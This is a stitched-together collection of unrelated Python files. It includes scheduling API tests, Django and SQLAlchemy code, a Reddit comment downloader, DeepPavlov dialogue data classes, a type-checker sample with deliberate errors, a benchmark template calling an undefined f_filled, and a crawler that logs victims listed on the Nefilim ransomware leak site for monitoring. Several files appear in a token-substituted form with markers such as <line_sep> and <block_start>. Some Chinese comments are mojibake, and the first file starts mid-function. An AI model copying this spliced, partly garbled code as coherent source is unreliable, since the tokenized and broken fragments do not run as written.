    assert events[0]['start'] == start

    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start + 100
    assert events[0]['end'] == end


# Test override when an event needs to be deleted:
# the override window fully contains the event, so the original vanishes.
@prefix('test_api_v0_override_delete')
def test_api_v0_override_delete(team, user, role, event):
    team_name = team.create()
    user_name = user.create()
    override_user = user.create()
    role_name = role.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev_id = event.create({'start': start, 'end': end, 'user': user_name,
                          'team': team_name, 'role': role_name})

    re = override(start - 10, end + 10, [ev_id], override_user)
    # Only the override event remains.
    assert len(re.json()) == 1

    re = requests.get(api_v0('events?user=' + user_name))
    events = re.json()
    assert len(events) == 0

    # The override keeps the ORIGINAL event's boundaries, not the
    # (wider) requested window.
    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start
    assert events[0]['end'] == end


# Test combination of above cases: one override spanning four adjacent
# events triggers an edit-end, two deletes, and an edit-start at once.
@prefix('test_api_v0_override_multiple')
def test_api_v0_override_multiple(team, user, role, event):
    team_name = team.create()
    role_name = role.create()
    user_name = user.create()
    override_user = user.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev1 = event.create({'start': start - 1000, 'end': start + 1000, 'user': user_name,
                        'team': team_name, 'role': role_name})
    ev2 = event.create({'start': start + 1000, 'end': start + 2000, 'user': user_name,
                        'team': team_name, 'role': role_name})
    ev3 = event.create({'start': start + 2000, 'end': end - 1000, 'user': user_name,
                        'team': team_name, 'role': role_name})
    ev4 = event.create({'start': end - 1000, 'end': end + 1000, 'user': user_name,
                        'team': team_name, 'role': role_name})

    re = override(start, end, [ev1, ev2, ev3, ev4], override_user)
    # Truncated ev1 + truncated ev4 + the single merged override event.
    assert len(re.json()) == 3

    re = requests.get(api_v0('events?user=' + user_name))
    events = sorted(re.json(), key=lambda x: x['start'])
    assert len(events) == 2
    assert events[0]['start'] == start - 1000
    assert events[0]['end'] == start
    assert events[1]['start'] == end
    assert events[1]['end'] == end + 1000

    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start
    assert events[0]['end'] == end
<import_from_stmt>django.contrib.contenttypes.fields GenericRelation<import_from_stmt>django.db models<import_from_stmt>openbook_notifications.models.notification Notification<import_from_stmt>openbook_posts.models PostReaction<class_stmt>PostReactionNotification(models.Model)<block_start>notification=GenericRelation(Notification related_name='post_reaction_notifications')<line_sep>post_reaction=models.ForeignKey(PostReaction on_delete=models.CASCADE)<line_sep>@classmethod<def_stmt>create_post_reaction_notification cls post_reaction_id owner_id<block_start>post_reaction_notification=cls.objects.create(post_reaction_id=post_reaction_id)<line_sep>Notification.create_notification(type=Notification.POST_REACTION content_object=post_reaction_notification owner_id=owner_id)<line_sep><return>post_reaction_notification<block_end>@classmethod<def_stmt>delete_post_reaction_notification cls post_reaction_id owner_id<block_start>cls.objects.filter(post_reaction_id=post_reaction_id notification__owner_id=owner_id).delete()<block_end>@classmethod<def_stmt>delete_post_reaction_notifications cls post_reaction_id<block_start>cls.objects.filter(post_reaction_id=post_reaction_id).delete()<block_end><block_end> |
"""
This script uses the Pushshift API to download comments from the specified subreddits.
By default it downloads all the comments from the newest one to the first one of the specified date.
"""<import_stmt>csv<import_stmt>sys<import_stmt>time<import_from_stmt>datetime datetime<import_stmt>requests<line_sep># 10,000 should cover at least 3 years of comments.
sys.setrecursionlimit(10000)<line_sep>SUBREDDITS=["mexico"]<line_sep>HEADERS={"User-Agent":"Comments Downloader v0.2"}<line_sep>COMMENTS_LIST=list()<line_sep># Year month and day.
TARGET_DATE="2019-01-01"<line_sep>TARGET_TIMESTAMP=datetime.fromisoformat(TARGET_DATE).timestamp()<def_stmt>init <block_start>"""Iterates over all the subreddits and creates their csv files."""<for_stmt>subreddit SUBREDDITS<block_start>writer=csv.writer(open("./{}-comments.csv".format(subreddit) "w" newline="" encoding="utf-8"))<line_sep># Adding the header.
writer.writerow(["datetime" "author" "body"])<line_sep>print("Downloading:" subreddit)<line_sep>load_comments(subreddit writer)<block_end><block_end><def_stmt>load_comments subreddit writer latest_timestamp=<none><block_start>"""Keeps downloading comments using recursion, it saves them 500 at a time.
Parameters
----------
subreddit : str
The desired subreddit.
write: csv.writer
A writer object that will save the comments to disk.
latest_timestamp: int
The timestampf of the latest comment.
"""<line_sep>base_url="https://api.pushshift.io/reddit/comment/search/"<line_sep>params={"subreddit":subreddit "sort":"desc" "sort_type":"created_utc" "size":500}<line_sep>stop_loading=<false><line_sep># After the first call of this function we will use the 'before' parameter.
<if_stmt>latest_timestamp<ne><none><block_start>params["before"]=latest_timestamp<block_end><with_stmt>requests.get(base_url params=params headers=HEADERS)<as>response<block_start>json_data=response.json()<line_sep>total_comments=len(json_data["data"])<line_sep>latest_timestamp=0<line_sep>print("Downloading: {} comments".format(total_comments))<for_stmt>item json_data["data"]# We will only take 3 properties, the timestamp, author and body.
<block_start>latest_timestamp=item["created_utc"]<line_sep>iso_date=datetime.fromtimestamp(latest_timestamp)<if_stmt>latest_timestamp<le>TARGET_TIMESTAMP<block_start>stop_loading=<true><line_sep><break><block_end>COMMENTS_LIST.append([iso_date item["author"] item["body"]])<block_end>writer.writerows(COMMENTS_LIST)<line_sep>COMMENTS_LIST.clear()<if_stmt>total_comments<l>500<block_start>print("No more rโesults.")<block_end><elif_stmt>stop_loading<block_start>print("Download complete.")<block_end><else_stmt><block_start>time.sleep(1.2)<line_sep>load_comments(subreddit writer latest_timestamp)<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>init()<block_end> |
# -*- coding: utf-8 -*-
# @Time : 2017/8/2 10:46
# @Author : play4fun
# @File : test_video.py
# @Software: PyCharm
"""
test_video.py:
"""<import_stmt>numpy<as>np<import_stmt>cv2<import_from_stmt>matplotlib pyplot<as>plt<line_sep>cap=cv2.VideoCapture('../../data/vtest.avi')#ไธๆฏๆ่ฏปๅ่ง้ข
# cap = cv2.VideoCapture('output.avi')
# cap = cv2.VideoCapture('Minions_banana.mp4')
# ๅธง็
fps=cap.get(cv2.CAP_PROP_FPS)# 25.0
print("Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}".format(fps))<line_sep># ๆปๅ
ฑๆๅคๅฐๅธง
num_frames=cap.get(cv2.CAP_PROP_FRAME_COUNT)<line_sep>print('ๅ
ฑๆ' num_frames 'ๅธง')<line_sep>#
frame_height=cap.get(cv2.CAP_PROP_FRAME_HEIGHT)<line_sep>frame_width=cap.get(cv2.CAP_PROP_FRAME_WIDTH)<line_sep>print('้ซ๏ผ' frame_height 'ๅฎฝ๏ผ' frame_width)<line_sep>FRAME_NOW=cap.get(cv2.CAP_PROP_POS_FRAMES)# ็ฌฌ0ๅธง
print('ๅฝๅๅธงๆฐ' FRAME_NOW)# ๅฝๅๅธงๆฐ 0.0
# ่ฏปๅๆๅฎๅธง,ๅฏน่ง้ขๆไปถๆๆๆ๏ผๅฏนๆๅๅคดๆ ๆ๏ผ๏ผ
# frame_no = 121
# cap.set(1, frame_no) # Where frame_no is the frame you want
ret,frame=cap.read()# Read the frame
print(ret frame)<line_sep># cv2.imshow('frame_no'+str(frame_no), frame)
FRAME_NOW=cap.get(cv2.CAP_PROP_POS_FRAMES)<line_sep>print('ๅฝๅๅธงๆฐ' FRAME_NOW)# ๅฝๅๅธงๆฐ 122.0
<if_stmt>frame<is><not><none>#ๅบ้
<block_start>plt.imshow(frame)<line_sep># plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
plt.show()<block_end> |
import pytest
import sqlalchemy as sa
from sqlalchemy_utils import get_referencing_foreign_keys


class TestGetReferencingFksWithCompositeKeys(object):
    """get_referencing_foreign_keys() when the referenced table has a
    composite primary key (first_name + last_name)."""

    @pytest.fixture
    def User(self, Base):
        class User(Base):
            __tablename__ = 'user'
            first_name = sa.Column(sa.Unicode(255), primary_key=True)
            last_name = sa.Column(sa.Unicode(255), primary_key=True)
        return User

    @pytest.fixture
    def Article(self, Base, User):
        class Article(Base):
            __tablename__ = 'article'
            id = sa.Column(sa.Integer, primary_key=True)
            author_first_name = sa.Column(sa.Unicode(255))
            author_last_name = sa.Column(sa.Unicode(255))
            # Composite FK referencing User's composite PK.
            __table_args__ = (
                sa.ForeignKeyConstraint(
                    [author_first_name, author_last_name],
                    [User.first_name, User.last_name]
                ),
            )
        return Article

    @pytest.fixture
    def init_models(self, User, Article):
        # Fixture exists only to force creation of both models.
        pass

    def test_with_declarative_class(self, User, Article):
        fks = get_referencing_foreign_keys(User)
        assert Article.__table__.foreign_keys == fks

    def test_with_table(self, User, Article):
        fks = get_referencing_foreign_keys(User.__table__)
        assert Article.__table__.foreign_keys == fks


class TestGetReferencingFksWithInheritance(object):
    """get_referencing_foreign_keys() with joined-table inheritance:
    FKs referencing the child table (Admin) should not include the FKs
    that merely implement the inheritance join of OTHER hierarchies."""

    @pytest.fixture
    def User(self, Base):
        class User(Base):
            __tablename__ = 'user'
            id = sa.Column(sa.Integer, primary_key=True)
            type = sa.Column(sa.Unicode)
            first_name = sa.Column(sa.Unicode(255))
            last_name = sa.Column(sa.Unicode(255))

            __mapper_args__ = {
                'polymorphic_on': 'type'
            }
        return User

    @pytest.fixture
    def Admin(self, User):
        class Admin(User):
            __tablename__ = 'admin'
            id = sa.Column(sa.Integer, sa.ForeignKey(User.id),
                           primary_key=True)
        return Admin

    @pytest.fixture
    def TextItem(self, Base, User):
        class TextItem(Base):
            __tablename__ = 'textitem'
            id = sa.Column(sa.Integer, primary_key=True)
            type = sa.Column(sa.Unicode)
            author_id = sa.Column(sa.Integer, sa.ForeignKey(User.id))

            __mapper_args__ = {
                'polymorphic_on': 'type'
            }
        return TextItem

    @pytest.fixture
    def Article(self, TextItem):
        class Article(TextItem):
            __tablename__ = 'article'
            id = sa.Column(sa.Integer, sa.ForeignKey(TextItem.id),
                           primary_key=True)

            __mapper_args__ = {
                'polymorphic_identity': 'article'
            }
        return Article

    @pytest.fixture
    def init_models(self, User, Admin, TextItem, Article):
        pass

    def test_with_declarative_class(self, Admin, TextItem):
        # Querying with the mapped class considers the whole hierarchy,
        # so TextItem's FK to User is included.
        fks = get_referencing_foreign_keys(Admin)
        assert TextItem.__table__.foreign_keys == fks

    def test_with_table(self, Admin):
        # Querying with the bare table only finds FKs to 'admin' itself.
        fks = get_referencing_foreign_keys(Admin.__table__)
        assert fks == set([])
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union, List, Dict, Any

from .core import Serializer, buffered

try:
    import pyarrow as pa
    pa_types = Union[pa.Table, pa.RecordBatch]
except ImportError:  # pragma: no cover
    pa = None
    pa_types = Any


class ArrowBatchSerializer(Serializer):
    """(De)serializes pyarrow Tables and RecordBatches through the Arrow
    IPC stream format, shipping the stream as a single buffer."""
    serializer_name = 'arrow'

    @buffered
    def serialize(self, obj: pa_types, context: Dict):
        sink = pa.BufferOutputStream()
        writer = pa.RecordBatchStreamWriter(sink, obj.schema)
        is_table = isinstance(obj, pa.Table)
        if is_table:
            writer.write_table(obj)
        else:
            writer.write_batch(obj)
        writer.close()
        # The header records which reader call to use on the other side.
        header = {'type': 'Table' if is_table else 'Batch'}
        return header, [sink.getvalue()]

    def deserialize(self, header: Dict, buffers: List, context: Dict):
        stream = pa.RecordBatchStreamReader(pa.BufferReader(buffers[0]))
        if header['type'] == 'Table':
            return stream.read_all()
        return stream.read_next_batch()


if pa is not None:  # pragma: no branch
    ArrowBatchSerializer.register(pa.Table)
    ArrowBatchSerializer.register(pa.RecordBatch)
<import_stmt>package<import_stmt>helper<import_stmt>package.assistant<line_sep>#We expect that 'a' below will be 1 not a module.
<import_from_stmt>confused_elements a<import_stmt>sys<line_sep> |
<import_from_stmt>typing List<import_stmt>numpy<as>np<line_sep># todo remove boilerplate duplications
# todo comments
# todo logging
# todo naming
from deeppavlov.models.go_bot.nlu.dto.nlu_response import NLUResponse
from deeppavlov.models.go_bot.policy.dto.digitized_policy_features import DigitizedPolicyFeatures
from deeppavlov.models.go_bot.tracker.dto.dst_knowledge import DSTKnowledge
from copy import deepcopy


class UtteranceFeatures:
    """DTO: training features of one utterance of a dialog, ready to be
    fed to the GO-bot policy model."""
    action_mask: np.ndarray
    attn_key: np.ndarray
    tokens_embeddings_padded: np.ndarray
    features: np.ndarray

    def __init__(self,
                 nlu_response: NLUResponse,
                 tracker_knowledge: DSTKnowledge,
                 features: DigitizedPolicyFeatures):
        digitized = features
        self.action_mask = digitized.action_mask
        self.attn_key = digitized.attn_key

        # todo proper oop
        vectorized = nlu_response.tokens_vectorized
        self.tokens_embeddings_padded = vectorized.tokens_embeddings_padded

        self.features = digitized.concat_feats


class UtteranceTarget:
    """DTO: the training target (gold action id) of one utterance."""
    action_id: int

    def __init__(self, action_id):
        self.action_id = action_id


class UtteranceDataEntry:
    """DTO: features plus target of one utterance of a dialog."""
    features: UtteranceFeatures
    target: UtteranceTarget

    def __init__(self, features, target):
        self.features = features
        self.target = target

    @staticmethod
    def from_features_and_target(features: UtteranceFeatures, target: UtteranceTarget):
        # Deep-copy so later mutation of the originals cannot leak in.
        return UtteranceDataEntry(deepcopy(features), deepcopy(target))

    @staticmethod
    def from_features(features: UtteranceFeatures):
        # Inference-time entry: no gold action is known yet.
        return UtteranceDataEntry(deepcopy(features), UtteranceTarget(None))
class DialogueFeatures:
    """DTO: per-utterance feature sequences of one whole dialogue
    (to feed the GO-bot policy model)."""
    action_masks: List[np.ndarray]
    attn_keys: List[np.ndarray]
    tokens_embeddings_paddeds: List[np.ndarray]
    featuress: List[np.ndarray]

    def __init__(self):
        self.action_masks = []
        self.attn_keys = []
        self.tokens_embeddings_paddeds = []
        self.featuress = []

    def append(self, utterance_features: UtteranceFeatures):
        """Push one utterance's features onto each parallel sequence."""
        step = utterance_features
        self.action_masks.append(step.action_mask)
        self.attn_keys.append(step.attn_key)
        self.tokens_embeddings_paddeds.append(step.tokens_embeddings_padded)
        self.featuress.append(step.features)

    def __len__(self):
        return len(self.featuress)


class DialogueTargets:
    """DTO: per-utterance gold action ids of one whole dialogue."""
    action_ids: List[int]

    def __init__(self):
        self.action_ids = []

    def append(self, utterance_target: UtteranceTarget):
        self.action_ids.append(utterance_target.action_id)

    def __len__(self):
        return len(self.action_ids)


class DialogueDataEntry:
    """DTO: features and targets of one whole dialogue."""
    features: DialogueFeatures
    targets: DialogueTargets

    def __init__(self):
        self.features = DialogueFeatures()
        self.targets = DialogueTargets()

    def append(self, utterance_features: UtteranceDataEntry):
        """Append one utterance's features and its target in lockstep."""
        self.features.append(utterance_features.features)
        self.targets.append(utterance_features.target)

    def __len__(self):
        return len(self.features)
class PaddedDialogueFeatures(DialogueFeatures):
    """DTO: dialogue features right-padded to a fixed sequence length
    (to feed the GO-bot policy model)."""
    padded_dialogue_length_mask: List[int]

    def __init__(self, dialogue_features: DialogueFeatures, sequence_length):
        super().__init__()

        src = dialogue_features
        pad = sequence_length - len(src)

        # 1 marks a real utterance position, 0 marks padding.
        self.padded_dialogue_length_mask = [1] * len(src) + [0] * pad

        # Pad every parallel sequence with zero-arrays shaped like its
        # first element (so a non-empty dialogue is assumed, as before).
        self.action_masks = src.action_masks + [np.zeros_like(src.action_masks[0])] * pad
        self.attn_keys = src.attn_keys + [np.zeros_like(src.attn_keys[0])] * pad
        self.tokens_embeddings_paddeds = (
            src.tokens_embeddings_paddeds
            + [np.zeros_like(src.tokens_embeddings_paddeds[0])] * pad)
        self.featuress = src.featuress + [np.zeros_like(src.featuress[0])] * pad


class PaddedDialogueTargets(DialogueTargets):
    """DTO: dialogue targets right-padded (with action id 0) to a fixed
    sequence length."""

    def __init__(self, dialogue_targets: DialogueTargets, sequence_length):
        super().__init__()

        pad = sequence_length - len(dialogue_targets)
        self.action_ids = dialogue_targets.action_ids + [0] * pad


class PaddedDialogueDataEntry(DialogueDataEntry):
    """DTO: one dialogue's features and targets, both padded to a fixed
    sequence length."""
    features: PaddedDialogueFeatures
    targets: PaddedDialogueTargets

    def __init__(self, dialogue_data_entry: DialogueDataEntry, sequence_length):
        super().__init__()

        self.features = PaddedDialogueFeatures(dialogue_data_entry.features, sequence_length)
        self.targets = PaddedDialogueTargets(dialogue_data_entry.targets, sequence_length)
class BatchDialoguesFeatures:
    """DTO: feature sequences of a batch of (already padded) dialogues
    (to feed the GO-bot policy model)."""
    b_action_masks: List[List[np.ndarray]]
    b_attn_keys: List[List[np.ndarray]]
    b_tokens_embeddings_paddeds: List[List[np.ndarray]]
    b_featuress: List[List[np.ndarray]]
    b_padded_dialogue_length_mask: List[List[int]]
    max_dialogue_length: int

    def __init__(self, max_dialogue_length):
        self.b_action_masks = []
        self.b_attn_keys = []
        self.b_tokens_embeddings_paddeds = []
        self.b_featuress = []
        self.b_padded_dialogue_length_mask = []
        self.max_dialogue_length = max_dialogue_length

    def append(self, padded_dialogue_features: PaddedDialogueFeatures):
        """Add one padded dialogue's sequences to the batch."""
        dlg = padded_dialogue_features
        self.b_action_masks.append(dlg.action_masks)
        self.b_attn_keys.append(dlg.attn_keys)
        self.b_tokens_embeddings_paddeds.append(dlg.tokens_embeddings_paddeds)
        self.b_featuress.append(dlg.featuress)
        self.b_padded_dialogue_length_mask.append(dlg.padded_dialogue_length_mask)

    def __len__(self):
        return len(self.b_featuress)


class BatchDialoguesTargets:
    """DTO: target sequences of a batch of (already padded) dialogues."""
    b_action_ids: List[List[int]]
    max_dialogue_length: int

    def __init__(self, max_dialogue_length):
        self.b_action_ids = []
        self.max_dialogue_length = max_dialogue_length

    def append(self, padded_dialogue_targets: PaddedDialogueTargets):
        self.b_action_ids.append(padded_dialogue_targets.action_ids)

    def __len__(self):
        return len(self.b_action_ids)


class BatchDialoguesDataset:
    """DTO: a batch of dialogues' features and targets.
    Handles the dialogues padding: every appended dialogue is padded to
    ``max_dialogue_length`` before being stored."""
    features: BatchDialoguesFeatures
    targets: BatchDialoguesTargets

    def __init__(self, max_dialogue_length):
        self.features = BatchDialoguesFeatures(max_dialogue_length)
        self.targets = BatchDialoguesTargets(max_dialogue_length)
        self.max_dialogue_length = max_dialogue_length

    def append(self, dialogue_features: DialogueDataEntry):
        """Pad one dialogue and add it to the batch."""
        padded = PaddedDialogueDataEntry(dialogue_features, self.max_dialogue_length)
        self.features.append(padded.features)
        self.targets.append(padded.targets)

    def __len__(self):
        return len(self.features)
import torch
from self_attention_cv import AxialAttentionBlock


def test_axial_att():
    """Smoke test: AxialAttentionBlock must preserve the input shape."""
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    block = AxialAttentionBlock(in_channels=256, dim=64, heads=8).to(device)
    inp = torch.rand(1, 256, 64, 64).to(device)  # [batch, tokens, dim, dim]
    out = block(inp)
    assert out.shape == inp.shape
    print('AxialAttentionBlockAISummer OK')
<import_from_stmt>datetime datetime<line_sep>TEN_MINS=600<line_sep>ONE_HOUR=3600<line_sep>TWO_HOURS=7200<line_sep>ONE_DAY=86400<def_stmt>fuzzy event base=<none> date_format=<none><block_start><if_stmt><not>base<block_start>base=datetime.now()<block_end><if_stmt>date_format<block_start>event=datetime.strptime(event date_format)<block_end><elif_stmt>type(event)<eq>str<block_start>event=datetime.fromtimestamp(int(event))<block_end><elif_stmt>type(event)<eq>int<block_start>event=datetime.fromtimestamp(event)<block_end><elif_stmt>type(event)<ne>datetime<block_start><raise>Exception("Cannot convert object `{}` to fuzzy date string".format(event))<block_end>delta=base-event<if_stmt>delta.days<eq>0<block_start><if_stmt>delta.seconds<l>60<block_start><return>"{} seconds ago".format(delta.seconds)<block_end><elif_stmt>delta.seconds<l>120<block_start><return>"1 min and {} secs ago".format(delta.seconds-60)<block_end><elif_stmt>delta.seconds<l>TEN_MINS<block_start><return>"{} mins and {} secs ago".format(delta.seconds<floordiv>60 delta.seconds%60)<block_end><elif_stmt>delta.seconds<l>ONE_HOUR<block_start><return>"{} minutes ago".format(delta.seconds<floordiv>60)<block_end><elif_stmt>delta.seconds<l>TWO_HOURS<block_start><return>"1 hour and {} mins ago".format(delta.seconds%ONE_HOUR<floordiv>60)<block_end><return>"over {} hours ago".format(delta.seconds<floordiv>ONE_HOUR)<block_end><elif_stmt>delta.days<l>2<block_start><return>"over a day ago"<block_end><elif_stmt>delta.days<l>7<block_start><return>"over {} days ago".format(delta.days)<block_end><return>"{date:%b} {date.day}, {date.year}".format(date=event)<block_end> |
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
<def_stmt>f_gold arr1 arr2 m n x<block_start>count,l,r=0 0 n-1<while_stmt>(l<l>m<and>r<ge>0)<block_start><if_stmt>((arr1[l]+arr2[r])<eq>x)<block_start>l<augadd>1<line_sep>r<augsub>1<line_sep>count<augadd>1<block_end><elif_stmt>((arr1[l]+arr2[r])<l>x)<block_start>l<augadd>1<block_end><else_stmt><block_start>r<augsub>1<block_end><block_end><return>count<block_end>#TOFILL
<if_stmt>__name__<eq>'__main__'<block_start>param=[([5 5 7 10 14 14 17 21 32 34 37 40 40 40 46 46 50 50 51 55 57 62 65 67 67 69 70 70 72 73 76 77 77 78 84 85 85 86 87 88 88 89 89 90 93 99] [2 5 8 8 10 12 13 15 17 18 20 20 21 27 28 31 34 37 40 46 48 52 53 54 54 58 59 60 66 68 68 69 70 71 72 73 77 77 80 84 84 92 92 95 97 97] 28 29 23 ) ([-84 52 -34 96 16 92 -64 -74] [-22 26 -12 -54 66 86 38 76] 6 5 7 ) ([0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1] [0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1] 37 26 42 ) ([60 92 42 83 55 76 29 62] [71 2 74 42 80 71 26 76] 4 7 7 ) ([-94 -94 -58 -40 -40 -26 -24 -22 -22 -22 -2 0 4 8 12 16 16 18 22 32 42 44 50 58 64 78 80 90] [-86 -84 -78 -76 -72 -70 -62 -58 -54 -54 -50 -46 -44 -40 -30 -28 -16 -10 10 36 36 48 70 84 84 90 94 98] 17 27 17 ) ([0 0 1 1 1 0 0 1 1 1] [1 1 1 0 1 1 0 0 0 0] 5 8 9 ) ([1 5 7 7 7 14 15 16 17 18 18 19 20 25 27 31 36 42 47 51 56 56 56 58 58 59 63 63 63 65 66 67 76 83 93 94 97] [2 3 7 8 9 10 17 18 21 28 29 29 33 35 46 47 47 49 49 49 53 56 58 59 59 60 65 67 70 78 81 85 85 87 90 92 96] 28 34 31 ) ([78 -74 52 56 -8 92 14 56 -72 -92 32 -94 -26 -8 -66 72 -24 36 -84 -4 -68 14 78 40 -82 -10 16 56 6 -16 30 24 -32] [-74 22 -14 -2 36 86 -70 -20 -76 -84 -40 -36 42 22 -60 -94 -18 8 -14 -42 -68 62 -60 2 40 -66 68 96 70 98 -38 -74 -92] 16 30 24 ) ([0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1] [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1] 25 33 33 ) ([17 50 65 4 19 10 45 70 76 81 28 97 55 70 38 2 40 67 36 33 6 85 25] [78 92 65 23 7 94 18 4 2 53 31 58 98 18 46 16 17 92 80 92 43 70 50] 16 22 22 )]<line_sep>n_success=0<for_stmt>i,parameters_set enumerate(param)<block_start><if_stmt>f_filled(*parameters_set)<eq>f_gold(*parameters_set)<block_start>n_success<augadd>1<block_end><block_end>print("#Results: %i, %i"%(n_success len(param)))<block_end> |
<import_stmt>sys<line_sep>sys.exit(1)<line_sep> |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from contrib.cluster_telemetry import ct_benchmarks_util
from contrib.cluster_telemetry import page_set
from contrib.cluster_telemetry import repaint_helpers

from benchmarks import rasterize_and_record_micro

# pylint: disable=protected-access
class RasterizeAndRecordMicroCT(
        rasterize_and_record_micro._RasterizeAndRecordMicro):
    """Measures rasterize and record performance for Cluster Telemetry."""

    @classmethod
    def Name(cls):
        # Benchmark name used on the command line and in results.
        return 'rasterize_and_record_micro_ct'

    @classmethod
    def AddBenchmarkCommandLineArgs(cls, parser):
        # Inherit the base micro-benchmark's flags, then add the Cluster
        # Telemetry specific ones (URL list, user agent, archive file).
        (rasterize_and_record_micro._RasterizeAndRecordMicro.
            AddBenchmarkCommandLineArgs(parser))
        ct_benchmarks_util.AddBenchmarkCommandLineArgs(parser)

    @classmethod
    def ProcessCommandLineArgs(cls, parser, args):
        ct_benchmarks_util.ValidateCommandLineArgs(parser, args)

    def CreateStorySet(self, options):
        # Build the story set from the CT-provided URL list; each page is
        # repainted after load so the record/rasterize work is measured.
        return page_set.CTPageSet(
            options.urls_list, options.user_agent, options.archive_data_file,
            run_page_interaction_callback=repaint_helpers.WaitThenRepaint)
from datetime import datetime
import logging

from bs4 import BeautifulSoup

from db.models import Victim
from net.proxy import Proxy
from .sitecrawler import SiteCrawler
import time


class Nefilim(SiteCrawler):
    # Actor label stored with each scraped victim.
    actor = "Nefilim"

    def _handle_page(self, soup):
        """Parse one listing page and upsert each victim into the database."""
        victim_list = soup.find_all("header", class_="entry-header")

        for victim in victim_list:
            victim_title = victim.find("h2", class_="entry-title").text.strip()
            # Posts appear titled "<name>. Part <n>"; keep only the name part.
            victim_name = victim_title[0:victim_title.find(". Part")]

            meta = victim.find("div", class_="entry-meta")

            published = meta.find("time", class_="entry-date").attrs["datetime"]
            # Drop the trailing 6 chars (UTC offset like "+00:00") before parsing.
            published_dt = datetime.strptime(
                published.strip()[:-6], "%Y-%m-%dT%H:%M:%S")

            victim_leak_site = meta.find("span", class_="posted-on").find("a").attrs["href"]

            q = self.session.query(Victim).filter_by(
                url=victim_leak_site, site=self.site)

            if q.count() == 0:
                # new victim
                v = Victim(name=victim_name, url=victim_leak_site,
                           published=published_dt, first_seen=datetime.utcnow(),
                           last_seen=datetime.utcnow(), site=self.site)
                self.session.add(v)
                self.new_victims.append(v)
            else:
                # already seen, update last_seen
                v = q.first()
                v.last_seen = datetime.utcnow()

            self.current_victims.append(v)

        self.session.commit()

        # server was timing out so slows it down a bit
        time.sleep(1.0)

    def scrape_victims(self):
        """Walk the site's paginated listing (via the "previous" nav link)
        and handle each page."""
        with Proxy() as p:
            r = p.get(f"{self.url}", headers=self.headers)
            soup = BeautifulSoup(r.content.decode(), "html.parser")

            # NOTE(review): `page_count` is never used, and the FIRST page
            # fetched above is never passed to _handle_page — only the pages
            # reached through the nav link are parsed. Confirm intentional.
            page_count = 0

            while True:
                page_nav = soup.find("div", class_="nav-previous")
                if page_nav is None:
                    break
                url = page_nav.find("a").attrs["href"]
                r = p.get(f"{url}", headers=self.headers)
                soup = BeautifulSoup(r.content.decode(), "html.parser")
                self._handle_page(soup)
# This sample tests the type checker's ability to handle
# custom subclasses of property.
# NOTE: the "should generate an error" lines below are INTENTIONAL type
# errors that the checker is expected to flag — do not "fix" them.

from typing import Any, Callable


class custom_property1(property):
    pass


class Custom1(object):
    @custom_property1
    def x(self) -> int:
        return 3

    @custom_property1
    def y(self) -> float:
        return 3.5

    @y.setter
    def y(self, val: float):
        pass

    @y.deleter
    def y(self):
        pass


m1 = Custom1()

a1: int = m1.x

# This should generate an error because m.x is
# an int and cannot be assigned to str.
b1: str = m1.x

c1: float = m1.y

# This should generate an error because m.y is
# a float and cannot be assigned to int.
d1: int = m1.y

# This should generate an error because there
# is no setter for x.
m1.x = 4

m1.y = 4

# This should generate an error because there is
# no deleter for x.
del m1.x

del m1.y


class custom_property2(property):
    _custom_func: Callable[..., Any] | None

    # A property subclass exposing an extra decorator hook, mirroring
    # the builtin .setter/.deleter pattern.
    def custom_function(self, _custom_func: Callable[..., Any]):
        self._custom_func = _custom_func
        return self


class Custom2(object):
    @custom_property2
    def x(self) -> int:
        return 3

    @custom_property2
    def y(self) -> float:
        return 3.5

    @y.setter
    def y(self, val: float):
        pass

    @y.deleter
    def y(self):
        pass

    @y.custom_function
    def y(self):
        pass


m2 = Custom2()

a2 = m2.y
reveal_type(a2, expected_text="float")

m2.y = 4
del m2.y
